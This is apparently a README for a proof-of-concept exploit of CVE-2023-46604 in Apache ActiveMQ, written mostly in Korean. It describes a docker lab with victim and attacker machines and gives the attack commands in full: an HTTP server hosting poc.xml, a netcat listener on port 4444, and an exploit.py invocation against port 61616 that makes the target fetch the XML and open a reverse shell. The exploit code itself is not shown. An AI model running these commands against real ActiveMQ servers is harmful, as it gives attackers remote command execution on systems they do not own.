
PoC 익스플로잇 for CVE-2023-46604 targeting Apache ActiveMQ, delivering a reverse shell via crafted XML payload over HTTP.
CVE-2023-46604

요구 환경에 따라 피해자 머신과 대상 머신의 2개 이미지를 포함한 docker-compose를 구축합니다. 피해자 머신에서 ActiveMQ를 시작합니다.
공격자 머신으로 전환: • HTTP 서비스를 열어 poc를 전송합니다: python3 -m http.server
• netcat을 사용하여 공격자 머신으로의 연결을 수신합니다: nc -nlvp 4444
• 공격자 머신으로 reverse shell 연결을 생성하는 페이로드를 전송합니다: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 여기서:
이를 통해 ‘exploit.py’ 파일을 실행한 후, 익스플로잇 코드는 웹 서버의 ‘poc.xml’ 패킷을 대상 서버에서 실행 중인 ActiveMQ 서비스의 주소로 전송합니다. 동시에 공격자 머신의 HTTP 웹 서버는 대상 머신의 IP 주소에서 보낸 요청을 수신합니다.

페이로드를 전송한 후, 공격자 머신의 4444 포트에서 수신 대기 중인 터미널로 전환합니다. 피해자 머신의 reverse shell이 전송된 것을 확인할 수 있습니다.